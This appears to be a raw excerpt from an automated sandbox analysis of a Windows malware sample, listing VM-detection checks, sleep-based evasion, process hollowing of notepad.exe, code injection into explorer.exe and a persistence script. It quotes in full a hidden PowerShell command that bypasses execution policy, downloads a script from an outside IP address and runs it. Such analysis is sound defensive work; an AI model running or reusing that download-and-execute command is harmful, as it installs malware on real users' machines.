Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\System32\notepad.exe	System information queried: FirmwareTableInformation	Jump to behavior
Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation
Source: C:\Windows\explorer.exe	System information queried: FirmwareTableInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Window / User API: threadDelayed 518	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 588	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5845	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4044	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4845	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4752	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 886	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 854	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1105

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tkaxwgf0.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.dll			Jump to dropped file

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe TID: 7316	Thread sleep count: 518 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 5845 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 4044 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7528	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 3744	Thread sleep count: 236 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 4015 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep count: 1105 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4916	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	File opened: C:\Users\user\	Jump to behavior

Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmCIt
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hGFsdZRrSFCX
Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ULRCqEmu
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: crDgbVmcI
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ofvnmeUUnQemuHSGZapdJlW
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IwPvMCItcKhEBQLzIkZVtNvuGzXuu
Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WiHgfSdtjz
Source: powershell.exe, 00000004.00000002.1927473773.00000213364CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CdvmCIrggdC
Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ulBBGbJHDSeEohgFsm
Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hgfSTuyfSAF
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FvmCIB
Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hgfsKPjwiFFfUV
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: byFQeMuOX
Source: powershell.exe, 00000003.00000002.1851509576.000001D9BDF12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: powershell.exe, 00000004.00000002.1927473773.0000021337E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hLKqSyfTrwqYZjizXaQemuP
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: eHGFSc
Source: powershell.exe, 00000003.00000002.1850167036.000001D9BDD31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ame
Source: powershell.exe, 00000004.00000002.1927473773.000002133740C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ewhgfsIrMf
Source: powershell.exe, 00000004.00000002.1927473773.000002133740C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CFYohgfsOUscMG
Source: powershell.exe, 00000003.00000002.1851509576.000001D9BDF7B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: powershell.exe, 00000004.00000002.1927473773.000002133679A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zpnGbAkhGFsdEezaocD
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: RHgfS
Source: powershell.exe, 00000004.00000002.1927473773.00000213364CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PvmCIV
Source: powershell.exe, 00000004.00000002.1927473773.0000021336A0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bHGfSfkfw

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.3 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 140.82.121.4 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.199.111.133 443	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Network Connect: 192.248.189.11 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.19.24 443	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Network Connect: 80.240.16.67 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 204.79.197.203 443

Allocates memory in foreign processes

Source: C:\Windows\explorer.exe

Memory allocated: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000 protect: page execute and read and write

Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\tkaxwgf0.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 10890000			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 57280000

Injects a PE file into a foreign processes

Source: C:\Windows\explorer.exe

Memory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 2580 base: 10890000 value: E8			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 2580 base: 57280000 value: E8

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\explorer.exe

Thread register set: target process: 2568

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\explorer.exe

Section unmapped: C:\Windows\System32\notepad.exe base address: 7FF7C9FC0000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 10890000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC0000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7C9FC1000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA3EC000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA591000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA841000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA86C000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA86D000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA870000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA872000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: 7FF7CA878000	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\notepad.exe base: FA17D7C010	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 57280000

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreak	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -command "& {invoke-webrequest -uri 'http://45.144.212.77:16000/setup' -outfile 'c:\users\user\appdata\local\temp\installer.ps1'; start-process 'powershell.exe' -argumentlist '-executionpolicy bypass -noprofile -file \"c:\users\user\appdata\local\temp\installer.ps1\"' -windowstyle hidden}"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -noprofile -windowstyle hidden -command "& {invoke-webrequest -uri 'http://45.144.212.77:16000/setup' -outfile 'c:\users\user\appdata\local\temp\installer.ps1'; start-process 'powershell.exe' -argumentlist '-executionpolicy bypass -noprofile -file \"c:\users\user\appdata\local\temp\installer.ps1\"' -windowstyle hidden}"			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
